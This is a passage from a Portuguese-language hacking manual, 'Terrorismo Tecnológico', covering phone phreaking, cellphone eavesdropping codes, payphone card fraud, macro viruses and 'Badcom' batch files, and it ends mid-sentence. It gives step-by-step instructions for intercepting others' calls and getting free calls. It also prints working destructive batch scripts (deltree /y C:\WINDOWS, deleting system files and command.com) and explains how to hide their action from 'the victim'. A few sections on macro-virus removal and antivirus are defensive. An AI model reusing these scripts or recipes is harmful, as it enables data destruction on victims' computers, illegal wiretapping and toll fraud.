Então devemos pegar o ultimo número do telefone a ser discado, no
caso o 7... Então subtraímo-lo de 10, o que vai resultar o número 3.
Somente vamos acrescentar o número 3 ao final do número
discado. O resultado vai ficar: número ligado sem pagar: 123-4567-3

C2. Ouvindo escuta de celulares

Primeiro retire a bateria do seu celular; depois de abrir o celular,


terão umas partes de metal embaixo dele, como três riscos de metal
||| , pegue um pedaço de papel alumínio e bote nos riscos de metal,
depois bote a bateria e ligue o celular, irão acontecer algumas
coisas, digite #1008# e depois de digitar o número e só ouvir as
conversas telefônicas.
Terrorismo Tecnológico 124
Aprenda Para Sobreviver

C3. Fazendo escutas com o PT 550 da Motorola

O sistema de telefonia celular e altamente vulnerável ao phreaking.


E simples fazer escutas telefônicas e outras coisas, como clonagem
de telefones para se efetuar ligações gratuitas, etc. Se você dúvida,
pegue um celular como o famoso e númeroso PT-550 da Motorola.
Tire a bateria do celular e note que ha três encaixes metálicos atrás
do aparelho. Coloque um pedaço de papel laminado no encaixe do
meio e recoloque a bateria. Ligue o telefone (ele esta agora no
modo de programação) e digite: # 08 # 11 XXXX #

Onde:

#08 - Liga o áudio de RX (Receptor)


#11 - Ajusta canal de funcionamento do transceptor
XXXX - número do canal (aconselho a você tentar números abaixo
de 800)
Exemplo: #08#11567#

Tente varias vezes ate encontrar um canal onde haja conversa.


Percebeu? Você esta fazendo uma escuta em um telefone celular.
Não requer pratica nem tão pouco habilidade. Vale lembrar que se
algum policial te pegar, você pode ir a cana. Ha também maneiras
de se fazer clonagem, isto e, fazer o seu telefone celular usar a linha
de outra pessoa. Eu particularmente nunca tentei, mas se você
quiser por sua pele a risco, procure pelo Motorola Bebe, ou outros
tantos textos existentes por ai. Falando de maneira simples, um
celular e um radio-transmissor que trabalha com freqüências na
faixa de 800 MHz, e que e capaz de alternar entre canais ao receber
comandos de um computador conhecido como Central Switch, que
controla o sistema telefônico móvel. Pode-se dizer que um aparelho
celular e dividido em duas partes: O Transceiver
(Transmissor/Receptor) e a cabeça de comando. Entende-se por
cabeça de comando o teclado e seu circuitos de comandos, a NAM
e a ESN. A NAM e um chip de PROM (Programable Read Only
Terrorismo Tecnológico 125
Aprenda Para Sobreviver

Memory) que contem informações sobre o funcionamento do celular,


como número, área, etc. Já a ESN (Eletronic Serial Number) e um
chip de ROM (Read Only Memory) que armazena um número,
geralmente de 11 dígitos octais, referentes a um número de série
único para cada telefone. Existem alguns modelos de celulares que
tem as suas NAMs reprogramaveis pelo próprio teclado do celular.
Outros necessitam que se ligue o celular a computadores.

C4. Escuta celular via TV

Nos avisamos que fazer escuta celular e ilegal de acordo com a


ECPA, e estas informações são exclusivamente para uso e
propósito educacional, deixando claro que não me responsabilizo
pelo mau uso das informações aqui contidas. TV VHF canais 70 - 83
pegue a melhor distribuição do melhor tronco usado pelos celulares.
Este e o que distribui nesse fluxo. Sintonize esses canais,
ajustando-os a sua atual freqüência e você estará preparado para
fazer a escuta. Cada canal da TV obrigara 5 MHz com ótimo
controle de sintonia. Se mesmo assim você não tiver uma
freqüência exata você precisara ler sobre freqüência e terá uma boa
idéia de como obter uma exata. Se a sensibilidade não estiver boa,
mesmo você estando na cidade, ou perto de uma freqüência exata,
você pegara alguma coisa. Você poderá também pegar
transmissões de negócios no tronco móvel se o mesmo estiver
fechado, as transmissões não serão ilegais a menos que a conversa
esteja codificada, então você poderá usar a velha TV para achar
outro local de negócios que use freqüências de 800 MHz ou
superior.

C5. Escuta celular

Ai tem diversão, e como tem... Você não tem idéia da importância


de uma escuta celular! Faça isso perto de um banco e você
Terrorismo Tecnológico 126
Aprenda Para Sobreviver

entendera. Para começar, esqueça todos os papeis laminados que


você já usou na sua vida, tanto para escuta celular quanto para
clonal, como já mostrei lá em cima, que não precisara de papel
alumínio. Tudo que você vai precisar e de um celular Motorola!
Repito: Meu celular para testes e um Motorola Elite II. Bom, dando
inicio a explicação de escuta celular, você tem que entrar no modo
de programação do seu celular. Para isso precisa digitar: FCN 00 **
83 78 66 33 STO. Agora digite # # que servira como um ENTER da
sua máquina no seu celular. Ai você escolhe a freqüência. Tem
gente ai falando que só existem duas freqüências, mas isso e
bobagem de quem não tem mais o que fazer e fica tirando a
esperança de listeners de plantão! O que essas pessoas ficam
falando e que só existem as freqüências fortes e que as de sinais
intermediários não podem ser burladas. BULLSHIT! O problema e
que essas pessoas não sabem que os celulares novos não pegam
outras freqüências mais, pois as empresas perceberam que
estavam fazendo escuta celular muito facilmente e resolveram
dificultar. Os celulares atuais estão usando apenas duas
freqüências, que são 300 MHz e 800 MHz. Para acessa-las, você
precisa entrar no modo de programação, digitar # depois 08# e
depois 11300# (no caso da de 300 MHz) e # para dar um "encher".
Se mesmo assim não pegar, vai pro centro da cidade, lá eu te
garanto, a não ser que você more numa floresta. Use os canais 300,
385, 799, 991!

5.8 Telefones Públicos

Índice
Terrorismo Tecnológico 127
Aprenda Para Sobreviver

D1. Cartão
D2. Grafite
D3. Esmalte de Unha Incolor
D4. Água Cândida
D5. Papel Alumínio
D6. Silicone
D7. Cartões Infinitos
D8. Plucking Block Line
D9. Aretha Sem Fichas
D10. Fazendo Orelhao Tocar Sozinho

D1. Cartão

Bote o cartão normalmente, assim que a pessoa atender segure o


número 9 e retire o cartão, fique segurando o número 9 ate acabar
de falar! Assim você poderá fazer ligações com o cartão e gastar
apenas uma unidade do cartão. Este truque também funciona com o
0 (zero).

D2. Grafite

O grafite e um material super condutor de energia, e o cartão


funciona assim, ele tem uns 50 fuziveiszinhos, cada ligação gasta
ele queimado um fuzível, então o nosso amigo grafite que e
condutor de eletricidade não deixa queimar os fuzíveis. Proceda da
seguinte maneira: rabisque os 2 lados do cartão com força, bote no
telefone publico e pronto, mas lembre-se, rabisque com força e
sempre que o grafite começar a acabar passe o grafite novamente!

D3. Esmalte de Unha Incolor


Terrorismo Tecnológico 128
Aprenda Para Sobreviver

O esmalte impede que esses fuzíveis queimem, faça também esse


com os cartões de vídeo game (divertilandia)! Passe esmalte na
parte de traz do cartão, e no de vídeo game passe na parte da fita
magnética!

D4. Água Cândida

Pegue o cartão telefônico novinho em folha! Dai, coloque o de


molho na água cândida (Vá a uma loja de limpeza e peça se não
souber), depois de 3 ou 4 dias a tinta do cartão ira sair, depois
pegue papel alumínio e cubra as partes metálicas com o papel
alumínio, então coloque o cartão no orelhão, ligue e faça a festa
porque as ligações ficarão infinitas (também se pode usar água
sanitária).

D5. Papel Alumínio

E só pegar um pedaço de papel alumínio e enrolar no cartão, pode


usar a vontade...

D6. Silicone

Este e o método mas fácil e comprovado por mim. Pegue aquela


silicone (transparente) e passe bem fina (fina mesmo) camada de
silicone por cima, deixe secar e mais tarde você Vera um cartão que
funciona infinitamente!

D7. Cartões Infinitos


Terrorismo Tecnológico 129
Aprenda Para Sobreviver

Atenção: esta dica tem que ser realizada com muita paciência, pois
se você errar apenas um detalhe estraga tudo! Primeiramente
consiga um estúpido cartão telefônico zerado! Lixe ele com aquela
lixa bem fina e deixe-o em repouso durante 3 ou 4 minutos.
Passados então cerca de 3 a 4 minutos percebera que a tinta do
cartão
nas costas da figura saiu. Quando a tinta nas costas da figura já
estiver totalmente desaparecida você percebera como a confecção
do cartão e uma merda. E um negocio desse tipo:

Costas do cartão
-----------------
| o-o o-o o-o |
| o-o o-o o-o | Em cada bolinha ligada por um fio que nem diz o
desenho ( o-o )
| o-o o-o o-o | coloque um papel laminado bem fino para interligar
as duas bolinhas.
| o-o o-o o-o | Ou também pode ser usado um fio bem fino.
| o-o o-o o-o |
-----------------

_____ ____
/\/\
/\/\
| bolinha 1| ============ | bolinha 1|
\/\/
\ _____ / \ _____ /

Cubra da bolinha 1 ate a 2 com o nosso amigo papel laminado ou fio


fino e pronto!

D8. Phucking Block Line


Terrorismo Tecnológico 130
Aprenda Para Sobreviver

Essa técnica e meio forçada, mas funciona. Nosso alvo são aqueles
aparelhos que bloqueiam chamadas telefônicas, o tão temido
BLOCK LINE. Bem, isso e só uma parte porque já estamos
imaginando uma matéria futura sobre o sistema, porém englobando-
o de forma muito mais ampla e falando mais dos detalhes técnicos.
Por enquanto espero que isso quebre o galho. A primeira coisa que
deve ser feita e descobrir se o problema e realmente o BLOCK LINE
e se a linha não foi bloqueada na companhia telefônica. Antes de
tudo olhe se a senha padrão que e 222 não foi mudada. Agora
procure o telefone principal da casa, aquele que quando desligado
desliga a todos da casa. Abra ele com uma chave de fenda e
procure uma caixinha preta escrita Bloch line. Abra agora também o
block line, com cuidado pra não quebrar. Apos ter feito isso tire a
película que cobre a placa do aparelho block line e exponha o
circuito à luz fluorescente (raios ultravioleta). Pronto, você apagou
todas as informações da placa! Agora e claro que as pessoas nem
vão desconfiar qual o problema...

D9. Orelhão Sem Fichas

Este método só funciona em telefones antigos, aqueles a base da


fichinha ou da moedinha (se estiver nos EUA, usa o Rex Box ).

Por exemplo, o número que você quer ligar e 823-2647 (número


fictício). Primeiro voce deve diminuir de 10 todos os números que
compõem o telefone a ser discado, no caso esse telefone ficaria
como segue abaixo.

Número a ser discado: 823-2647

ORIGINAL

(10 - 8) = 2
(10 - 2) = 8
(10 - 3) = 7
Terrorismo Tecnológico 131
Aprenda Para Sobreviver

(10 - 2) = 8
(10 - 6) = 4
(10 - 4) = 6
(10 - 7) = 3
|_______ NOVO NÚMERO

O novo número será: 287-8463

O que você vai ter que fazer e bater no bocal do telefone o número
de vezes correspondente a subtração.

Bata 2 vezes no bocal ( intervalo de 2 segundos )


Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 7 vezes no bocal ( intervalo de 2 segundos )
Bata 8 vezes no bocal ( intervalo de 2 segundos )
Bata 4 vezes no bocal ( intervalo de 2 segundos )
Bata 6 vezes no bocal ( intervalo de 2 segundos )
Bata 3 vezes no bocal ( intervalo de 2 segundos )

Desta maneira você poderá fazer ligações gratuitas. Quando estiver


ágil poderá ligar mais rápido, ai fica fácil!

D10. Fazendo Orelhão Tocar Sozinho

Trata-se de como fazer um telefone publico tocar. E muito simples,


não vou explicar como esse código funciona, pois embora pareça
simples foi bem complexo para descobrir, já que envolveu todo o
sistema de telefonia. Apenas chegue no orelhão e digite o código de
chamada a cobrar (varia de cidade para cidade), no caso da minha
cidade o código e 9090. Vamos supor que você esteja na minha
cidade e queira fazer esse método, então você digitaria no telefone
publico 9090222999999999999999999, espere um pouco e você
escutara aquela mulher da telefonia falando: "Chamada a cobrar,
para aceitá-la, continue na linha apos a identificação..." Assim que a
mulher começar a falar, desligue o telefone, saia de perto e espere.
Terrorismo Tecnológico 132
Aprenda Para Sobreviver

O telefone começara a tocar em uns 30 segundos, e com certeza


valera a pena ver aquele bando de lammers ignorantes atendendo!

5.9 Observações sobre clonagem

A clonagem é algo muito comum cos os celulares, tambem não era


de se esperar outra coisa já que une a facilidade de fazela com os
altos precos da tarifacao celular. Com o CDMA as operadorar dizem
que não é possivel fazer a clonagem, pura mentira, já que perto de
aeroportos por exemplo o sinal se torna analogico, e com um
simples escanner de sinais é possivel pegar o codigo Hex, entao
tomem cuidado ao ir nesses lugares, ou travem o seu celular para
apenas funcionar em modo Digital. Outra onda crescente é colocar
linhas de orelhao nos celulares. Isto funciona pois a linha analogica
funciona parecidamente com a do celular. Entao da para se fazer
esta malandragem com cerca de 20 celulares para cada linha do
orelhao. Isso tudo é CRIME!
Terrorismo Tecnológico 133
Aprenda Para Sobreviver

Capítulo VI

Vírus - Sem dúvida nada mais assusta usuários e


administradores do que os vírus, estas pragas cibernéticas estão
se espalhando nos sistemas a cada dia com uma força maior e
numa escala geométrica.
Terrorismo Tecnológico 134
Aprenda Para Sobreviver

Introdução

Navegando na Internet, lendo e-mails, baixando arquivos ou


programas, lendo um disquete de um amigo ou até um cd-rom de
uma banca de jornal podemos pegar um vírus. Qualquer que seja
o tipo extensão que o arquivo tiver não podemos descartar a
hipótese de ser um trojan ou vírus. Mesmo em uma foto ou em um
Mp3 ele pode vim escondido e infectar todo o sistema.

6.1 Vírus de macro

Se você executar uma tarefa de forma repetitiva no Microsoft


Word, poderá automatizá-la usando um macro. Um macro é uma
seqüência de comandos e instruções do Word que você agrupa
como um único comando para executar uma tarefa
automaticamente e o woed já vem com vários macros instalados e
você ainda pode configurar um novo macro.

Algumas utilizações típicas dos macros são:

1. Acelerar as tarefas rotineiras de edição ou formatação.

2. Para combinar vários comandos; por exemplo, inserir uma


tabela com bordas e tamanho específico, e com um determinado
número de linhas e colunas.

3. Tornar uma opção de caixa de diálogo mais acessível.

4. Automatizar uma seqüência complexa de tarefas.

O Word oferece duas maneiras de criar uma macro: a gravação


de macro e o Editor do Visual Basic.
Terrorismo Tecnológico 135
Aprenda Para Sobreviver

Para acessar rapidamente a macro, você poderá atribuí-la a


uma barra de ferramentas, um menu ou teclas de atalho. Para
executar a macro, basta clicar no botão da barra de ferramentas
ou no comando de menu, ou pressionar as teclas de atalho.

Se você der a um novo macro o mesmo nome de um comando


interno do Word, as ações do novo macro substituirão as ações
existentes. Por exemplo, se você gravar um novo macro e nomeá-
la ArquivoFechar, ela ficará anexada ao comando Fechar.
Quando você escolher o comando Fechar, o Word executará as
novas ações gravadas.

O QUE É UM VÍRUS DE MACRO?

Os vírus comuns geralmente se concentram em funcionar em


nível de sistemas operacionais, isto é ele age no próprio sistema
como o Windows 9X, Windows ME... e até alguns no Unix. Muitas
vezes os programadores que o criam os fazem trabalhar não no
S.O., mas sim em nível aplicativos.
Alguns aplicativos que trabalham com planilhas eletrônicas,
processadores de texto e banco de dados, utilizam linguagens de
macro. E muitas aplicações têm a função de auto-executar estes
macros, esses por sua vez servem para o funcionamento do
aplicativo.
Porém esses macros se forem reescritos, podem danificar
seriamente todo o sistema. Essa combinação fornece um sério
perigo para usuários de computadores que pensavam que
arquivos de dados não machucavam seu sistema.

Então cada vez que o aplicativo é aberto, acaba executando


automaticamente esta macro e o vírus ou trojan se espalha no
sistema.
Terrorismo Tecnológico 136
Aprenda Para Sobreviver

Ele pode ter varias finalidades, como roubar informações,


atrapalhar o sistema, apagar arquivos de seu disco rígido,
renomear arquivos existentes, copiar arquivos pessoais de seu
disco rígido ou infectar arquivos comuns a ele como alguns que
apenas estragam documentos do Microsoft Word.

Removendo um vírus de macro.

Para remoçar siga os pacos a seguir:

- Inicie o Word

- Se o arquivo infectado já estiver aberto, no utilitário escolha a


opção comando de macro, lá apague todas os macros do arquivo
e do normal.dot

- Caso o arquivo não estiver aberto então apague somente os


macros do normal.dot

Alterar o nível de segurança para proteção


contra vírus de macro

- Em ferramentas, clique em opções.

- Clique na guia segurança.

- Em segurança de macro, clique em segurança de macro.


Terrorismo Tecnológico 137
Aprenda Para Sobreviver

- Clique na guia nível de segurança e selecione o nível de


segurança que deseja usar.

Como eliminar seqüelas dos vírus?

Pode ser que, mesmo depois de eliminado o vírus de macro,


ainda restem algumas seqüelas no seu Word: menus faltando,
botões a menos, travamentos, combinações de teclas desativadas.

Primeiro, tente seguir as dicas que você encontra nesta pagina,


no site da McAfee: http://www.mcafee.com/t0118.html. Lá, você
pode retirar o programa DocFix, especifico para resolver estes
problemas.

Se não der certo, há uma solução radical, mas eficiente, a ser


tentada em ultimo caso. Delete o arquivo NORMAL.DOT
automaticamente, o Word criara outro NORMAL.DOT, com as
configurações padrão do programa. A desvantagem e que você
perderá as suas configurações personalizadas: se você tinha
alguma configuração personalizada (Autotexto, Macros, barras de
Ferramentas personalizadas), elas serão perdidas. Mas pelo
menos, você tem a certeza de que as seqüelas sumirão.

Agora, de nada adianta tudo isto se você ainda tiver algum


documento do Word infectado no seu computador, que pode
infectar o NORMAL.DOT novamente a qualquer momento. Passe
o antivírus antes de fazer o descrito acima.

Depois de terminar o reparo, não esqueça de colocar o novo


NORMAL.DOT como somente-leitura.
Terrorismo Tecnológico 138
Aprenda Para Sobreviver

Guia o que fazer ao encontrar um vírus de


macro?

•Reparar o arquivo – certas ferramentas de antivírus


conseguem remover o vírus de um arquivo e manter a integridade
e o arquivo funcionando perfeitamente após sua descontaminação.
O antivírus deve remover o vírus do arquivo, e caso a ameaça for
um worm ou Cavalo de Tróia, exclui o arquivo.
• Colocar o arquivo em quarentena
Torna o arquivo inacessível para qualquer programa que não o
próprio antivírus. Desse modo, não é possível abrir o arquivo por
acaso e, assim, disseminar o vírus.
• Excluir o arquivo
obs: Use essa opção caso as duas a cima não funcionar.

6.2 Vírus

É muito importante conhecer alguns sinais comuns de um


vírus: mensagens incomuns que são exibidas na tela,
desempenho de sistema reduzido, perda de dados e incapacidade
de acessar sua unidade de disco rígido entre outros.

Programas em disquetes e unidades removíveis também


podem conter vírus. Verifique todos os disquetes e unidades antes
de copiar ou abrir arquivos, ou antes, de iniciar o computador a
partir deles.

Tenha pelo menos um programa de detecção de vírus


comercial e use-o regularmente para verificar se há vírus no seu
computador. Certifique-se de obter os mais recentes arquivos de
Terrorismo Tecnológico 139
Aprenda Para Sobreviver

assinatura de vírus para o seu programa quando estiverem


disponíveis, pois novos vírus são criados todos os dias.

6.3 Exemplos de vírus

Vamos ver dois exemplos de vírus

Exemplo 1: -- "Autodestruição"

Entre no Prompt MS-DOS

Aparecerá assim: C:\WINDOWS>

Digite: cd..

Aparecerá: C:

Digite: edit destuidor

Na tela azul que aparecerá, digite:

copy con arquivo.bat


@echo off
@echo destruidor is r0x
del *.sys
del *.exe
del *.com
cd windows
del *.*
cd\
del arquivo.bat
Terrorismo Tecnológico 140
Aprenda Para Sobreviver

@echo destruidor

Salve o arquivo na opção Salvar Como.


Pronto, um arquivo vírus de lote foi criado no seu computador.
Mais ele não fará nada contando que você não digite 'arquivo' no
diretório onde ele está!

Remova este arquivo (arquivo.bat) para um disquete, junto a


ele um "autoexec.bat", com a linha de comando:
C:\arquivo.bat.

Exemplo 2: -- "HiperDestruição"

Entre no Promt Ms-Dos

Aparecerá assim: C:\WINDOWS>

Digite: cd..

Aparecerá: C:

Digite: edit Hacker

Na tela azul que aparecerá, digite:

@Echo off
@Break off
@Echo "Destruição total"
(uma linha sem nada)
deltree/y C:\(pasta que escolher)
Tipo assim:
Terrorismo Tecnológico 141
Aprenda Para Sobreviver

Se colocar -- deltree/y C:\WINDOWS -- Você vai deletar a


pasta do Windows, junto com ela as *.DLL e assim já era o
sistema.
Ou, pode ser assim -- deltree/y C:\Meus Documentos
Salve o arquivo na opção Salvar Como.

6.4 Entendendo mais sobre vírus

Vírus de disco - exemplo: Stoned, Ping-Pong, Michelangelo...

Infectam o BOOT-SECTOR. Esta é à parte do disco


responsável pela manutenção dos arquivos. Da mesma forma que
uma biblioteca precisa de um fichário para saber onde se
encontram os livros, um disco precisa ter uma tabela com o
endereço dos dados armazenados. Qualquer operação de entrada
e saída precisariam do uso dessa tabela. Salvar ou carregar um
arquivo num disquete infectado possibilitaria a ativação do vírus,
que poderia infectar outros disquetes e o disco rígido.

Vírus de Arquivo - exemplo: Jerusalém, Athenas, Freddy

Infectam arquivos executáveis ou de extensão.SYS, .OVL, .


MNU, etc. Estes vírus se copiam para o inicio ou fim do arquivo.
Dessa forma, ao se chamar o programa, o vírus executara junto ao
programa.

DIR-II

Altera a tabela de arquivos de forma a ser chamado antes do


arquivo ou programas.
Terrorismo Tecnológico 142
Aprenda Para Sobreviver

Detecção

Demora maior na execução de um programa. O sistema fica


mais lento em suas tarefas.

Aumento no tamanho dos programas ou arquivos.

Alteração na data de criação do programa. Quando o vírus


infecta, o programa aparece uma data de criação recente, pois
sempre o sistema grava a última data em que o arquivo foi
atualizado sendo do micro ou por você.

No caso de vírus de disco, é possível que alguns arquivos do


disquete desapareçam.

Igualmente o aparecimento de mensagem acusando Bad


Cluster em todos os disquetes usados (não confundir com o que
acontece com um disquete de 360k formatado por engano para
1.2 de capacidade). Nos tempos do vírus Ping-pong, essa era uma
dica de infecção.

Disquete funciona em PC-XT, mas não funciona em um PC-AT.

Antivírus alerta para modificação em seu arquivo (os novos


programas antivírus não funcionam quando são modificados pela
infecção de um vírus). Não se deve utilizá-los mesmo quando
possível se houver vírus na memória, pois isso infecta todos os
arquivos que forem examinados.

Utilização de ferramentas como antivírus para visualização do


setor de Boot mostram modificações.

Programa Windows deixa de funcionar ou congela


repetidamente às vezes dando erro de tela azul.
Terrorismo Tecnológico 143
Aprenda Para Sobreviver

6.5 Como funciona um programa antivírus

- Vigiando a memória do micro para ação de qualquer novo


programa

- Mantendo um arquivo com as características do(s) arquivos


Antes da infecção. Ele examina o CRC, a data de criação do
arquivo, o tamanho e outras características cuja alteração
denunciaria ação indevida.

- Abrindo cada um dos arquivos passiveis de infecção e


Examinando o código do programa. Lembrar que o vírus é
um programa de computador que se copia sem intervenção
humana para outro programa ou boot sector. Um programa
é composto de às vezes milhares de instruções em
linguagem de baixo nível.
O que o programa antivírus faz é ler esse
"texto" dos arquivos executáveis (de extensão.COM,
.EXE ou .OVL, (entre outros) e procurar por uma linha
de código característica de vírus de computador.
O programa, ao encontrar uma semelhança entre o código
do vírus e a linha de código que ele tem armazenado
na memória como pertencente a um vírus, aciona a
mensagem de alerta para o usuário.

6.6 Badcom

Badcom são arquivos (.com) em que quando executados


realizam determinada seqüência de tarefas no computador.
Terrorismo Tecnológico 144
Aprenda Para Sobreviver

Não é nada mais do que um programinha feito em alguma


linguagem e salvo como um arquivo .com que é rodado tanto em
dos quanto em Windows.
Para isto deve-se fazer um arquivo de lote com os comandos e
compilá-lo
O compilador de arquivos de LOTE (.BAT) é o
BAT2EXEC.COM com certeza é o melhor para fazer esta
operação.

Vejamos alguns comandos.

@ECHO OFF

Comando para não ser mostrados as linhas de comando em uma


janela do MS-DOS, Exemplo: Colocando o comando DIR em um
Badcom sem o @ECHO OFF no prompt ele mostrará o comando
escrito na janela.. C:\DIR
Com o comando @ECHO OFF, ele simplesmente elimina os dígitos
dos comandos a serem mostrados.

CLS

Comando do MS-DOS, para limpar a tela.

ECHO

Para desativar o comando @ECHO OFF, e mostrar caracteres em


uma janela
Exemplo: ECHO "Mensagem" Irá mostrar a mensagem na janela,
após isso automaticamente retorna a não aparição de comandos na
Janela.
Criando arquivos com o comando ECHO:
Para criar um arquivo com este comando, é necessário o comando ,
Terrorismo Tecnológico 145
Aprenda Para Sobreviver

exemplo: ECHO Nomedoarquivo.extensão


Irá criar o arquivo no ambiente do MS-DOS...
Para criar arquivos com textos ou comandos, é necessário fazer o
seguinte comando:
ECHO ARQ.EXT "Comando ou mensagem" OBS: As aspas são
apenas para
indicação porém em comandos não funcionam as aspas.
Ex: ECHO Eu.BAT DIR
Irá criar um arquivo chamado Eu.BAT (Arquivo de Lote) Com o
comando
DIR dentro do mesmo.

ATTRIB

Este comando permite esconder um determinado arquivo, torne-o


somente para leitura, ou torne arquivo do sistema.
Para obter os comandos simplesmente digite na janela do MS-DOS:
ATTRIB /?

MD

Para Criar diretórios


Ex: MD NOMEDODIR

RD

Comando para desfazer diretórios vazios.


EX: RD 'NOME DA PASTA VAZIA'

DEL ou DELETE

Para apagar arquivos, no Badcom é usado da seguinte maneira,


Terrorismo Tecnológico 146
Aprenda Para Sobreviver

Para deletar arquivos sem ter problemas de BUG, é necessário


fazer com
que o comando não tenha a opção (*.*), pois surgirá um prompt de
confirmação de exclusão.
Digite então da seguinte maneira:

DEL *.Extensão, exemplo.. para apagar os arquivos .INI do diretório


do Windows: del c:\windir\*.ini ou use:
c:
cd\
cd windir
del *.ini

DELTREE

Muitos não têm conhecimento do que este comando pode causar


em um
sistema, pois é usado da maneira básica...
Este "pode ser" o Mais perigoso comando contido em um Badcom.
Uso com BUG:
DELTREE DIRETORIO
Só que com este comando, aparecerá a confirmação de exclusão do
diretório.
Porém ha uma opção no DELTREE que evita a aparição do prompt
de confirmação, sendo ela a mais destrutiva, deletando todos os
arquivos de um dir.
Para usar o Deltree de forma destrutiva basta acrescentar a opção
/Y no mesmo, Exemplo:

C:\Deltree /y windows
Excluindo windows...

REN

Rename é um comando para renomear algum arquivo.


Terrorismo Tecnológico 147
Aprenda Para Sobreviver

REN command.com command.cai


REN Autoexec.bat autoexec.euu

PROMPT

Com este comando você pode trocar o C:\> do Ms-dos pelo que
você quiser.
Por exemplo:
C:\> PROMPT teste:\>
teste:\>

GOTO

Este comando faz com que o BAT pule ou volte para determinada
parte do
Programa.
Exemplo: O uso do GOTO é muito usado se quiser que não pare de
repetir
determinado comando ... usando o comando CLS, veja:

@echo off
:INI <-- Indica a parte do programa onde vai ser voltado o
comando
Cls Usam-se dois ponto antes, outros exemplos são :START
:COMEÇO

GOTO INI <-- Aqui o comando GOTO, para voltar para o alvo
indicado.
Terrorismo Tecnológico 148
Aprenda Para Sobreviver

@ECHO OFF

Este comando "esconde" a ação!! Por exemplo, se você escrever


del *.* com o @Echo Off a vítima vai pensar que nada aconteceu,
mas se você não pôr o @Echo Off ela vai ver o que está
acontecendo e vai ter tempo de desligar o computador!!
(indispensável num Badcon!).

CLS

"Limpa a tela". Por exemplo, se você quiser que não apareça nada
quando a vítima executar o Badcon.
Ex.: @Echo Off
Del *.*
cd windows
del *.com
del *.ini
cls

ECHO

Este comando "mandar mensagens" para o indivíduo, por exemplo,


se você escrever:
@echo off
echo Você está perdido!!

O Badcon exibirá a seguinte mensagem:


Você está perdido!!

CD

Este comando serve para "criar" diretórios, exemplo:


MD Hacker
cria o diretório Hacker/
Terrorismo Tecnológico 149
Aprenda Para Sobreviver

COPY

Serve para "copiar" arquivos, exemplo:


copy c:\*.* c:\windows
Ele copiará todos os arquivos soltos em C:\ (menos os diretórios)
para C:\Windows

DEL

"Apaga" arquivos determinados, exemplo:


@echo Off
cd\windows
del win.com
Com estes comandos ele deletará arquivos determinados, no caso o
win.com, que é indispensável para funcionar o Windows. Sem ele
não dá para iniciar o Windows.

DELTREE

"Apaga os diretórios" existentes dentro de outros diretórios,


exemplo:
Deltree/y c:\
Ele apagará todos o diretórios existentes em c:\ ao contrário do del
*.* que só apagaria os arquivos soltos em c:\.
Aí você me pergunta: Por que o /y depois do Deltree?? Quando
você dá um Deltree, ele pegunta se quer realmente apagar
determinado arquivo, mas com este /y o bug não existe mais e ele
apagará os arquivos direto sem perguntar a vítima!

RD

Comando para "desfazer diretórios" vazios no Bad-com, exemplo:


RD Hacker
Desfaz o diretório Hacker
Terrorismo Tecnológico 150
Aprenda Para Sobreviver

REN

"Renomeia" um arquivo especificado, exemplo:


Ren autoexec.bat Hacker

O arquivo está renomeado para Hacker

FORMAT

Este comando é usado para "formatar" discos como o C:\ ou o A:\.


Só que este comando vai perguntar ao usuário se ele tem a certeza
que quer mesmo formatar.

CHOICE

Comando que "possibilita um prompt para resposta".


Exemplo: CHOICE /c123456789
Para números ou letras é necessário o uso do /c, sem o uso do
comando /c somente CHOICE, mostrará o prompt: [Y,N]...
Com o /c e os números irá mostrar: [1,2,3,4,5,6,7,8,9]...
O comando CHOICE tem que vir sempre acompanhado do IF e
ERRORLEVEL.
IF e ERRORLEVEL é um complemento usado pelo CHOICE
Comando que possibilita o desenvolvimento de questões e prompts
para o sacaniado:
Os comandos CHOICE e IF ERRORLEVEL são comandos que um
precisa do outro. Nenhum se mantém sozinho.

DOSKEY

O Doskey serve para "trocar" um comando por outro.


Exemplo: DOSKEY DIR CLS
Sempre que a vítima digitar DIR sera executado o comando CLS.

GOTO

Serve para "ir" para determinado ponto do arquivo, exemplo:


LOOP (local onde o comando GOTO retornará)
Terrorismo Tecnológico 151
Aprenda Para Sobreviver

DIR
GOTO LOOP
Com isso o programa ficará dando DIR repetidamente

IF EXIST

"Checa para ver se existe" determinado arquivo, e se existir realiza


uma função, se não existir realiza uma outra finção. Exemplo:
CD WINDOWS Entra no diretorio Windows
IF EXIST WIN.COM GOTO WIN: procura pelo arquivo win.com, se
existir ele vai para o WIN:, se não ele vai para linha seguinte.
CD WIN-95 Como não existia o diretorio windows, ele vai tentar o
win-95
IF EXIST WIN.COM GOTO WIN:
GOTO FIM: Vai para o FIM:
WIN:
DEL WIN.COM Deleta o win.com
FIM: Fim do arquivo
Sabendo estes comandos já podemos fazer o nosso 1° Badcon:

Entre no edit do MS-DOS e digite os comandos abaixo e salve como


"(nome).bat" (sem aspas e sem parênteses).
Nunca esqueça que o arquivo deve ser salvo com a extensão ".bat".
Para entrar no Edit do MS-DOS, abra o MS-DOS e digite "edit" (sem
aspas).

Exemplo de Badcom (obtido na Internet)

@echo off
cd\ -----------------------> vai para a unidade de disco C:\
cd windows -------------------> entra no diretório Windows
del *.com ---------------------> deleta todos os arquivos com extensão
.com
del *.sys ---------------------> deleta todos os arquivos com extensão
.sys
cd\ -----------------------> volta para a raiz de C:\
del command.com -------------------> deleta o arquivo command.com
Terrorismo Tecnológico 152
Aprenda Para Sobreviver

(o do MS-DOS)
echo Seu computador acabou de ser invadido por -=|Hacker|=- ------
----> exibirá a mensagem digitada

Para escrever a badcom é usado qualquer editor de textos


como o EDIT do DOS e depois precisa somente ser compilado.
Terrorismo Tecnológico 153
Aprenda Para Sobreviver

Capítulo VII

Bomba DOS – funcionamento e descrição.


Terrorismo Tecnológico 154
Aprenda Para Sobreviver

7.1 O que os hackers chamam de Bomba DOS?

Bomba DOS não são badcons e nem vírus, é um arquivo com


uma única finalidade. Sendo muito fácil de construir e um usuário
com um pouco de experiência em programação em lote pode fazer
uma Bomba DOS.

A Bomba DOS é um arquivo de lote, (*.BAT) contendo


comando DOS com a função somente de destruir e não de
recolher informações.

Então desconfie de arquivos BAT, nunca execute sem conferi-


lo antes, já que o antivírus não vai funcionar para ele. Para você
verificar o conteúdo do arquivo você poderá abri-lo em qualquer
editor de texto, desde o Edit (DOS), Bloco de notas do Windows,
ou Word, StarOffice... Só que para isso deve-se ter alguma noção
de programação.

Ele destrói tudo sendo um S.O (Sistema operacional), arquivos,


dados, enfim o que estiver pela frente. Também é valido lembrar
que As Bombas mais destrutivas são aquelas que vem no
